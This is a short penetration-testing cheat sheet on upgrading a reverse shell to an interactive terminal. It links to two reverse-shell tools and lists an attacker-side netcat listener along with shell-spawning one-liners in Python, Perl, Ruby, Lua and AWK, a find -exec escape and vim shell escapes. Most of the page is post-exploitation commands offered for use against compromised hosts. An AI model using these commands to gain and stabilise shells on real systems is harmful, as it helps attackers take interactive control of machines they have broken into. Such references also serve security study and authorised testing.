TTY Upgrade

Tools

LazyRevShell

GitHub - aniqfakhrul/LazyShell: Script to generate reverse shellsGitHub

pty4all

GitHub - laluka/pty4all: By using its cutting edge technology (lolnope), you can now have a persistent multi reverse pty handler!GitHub

4 different methods

# Attacker
nc -nlvp [PORT]
(...)
$ su admin
su: must be run from a terminal

# 1
/bin/bash

# 2
python -c "import pty; pty.spawn('/bin/bash')"

# 3 
$ /usr/bin/script -qc /bin/bash /dev/null
www-data@ubuntu:/var/www/Magic/images$

# 4
perl -e 'exec "/bin/bash";'

Python

python -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import pty; pty.spawn("/bin/sh")' 

/bin/sh -i

/bin/sh -i
sh: no job control in this shell
sh-4.2$

Perl

perl —e 'exec "/bin/sh";'

perl: exec "/bin/sh";

The command directly above should be run from a script.

Ruby

ruby: exec "/bin/sh"

The command directly above should be run from a script.

Lua

lua: os.execute('/bin/sh')

The command directly above should be run from a script.

AWK

awk 'BEGIN {system("/bin/sh")}'

Find

find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

VIM

vim -c ':!/bin/sh'

vim
:set shell=/bin/sh
:shell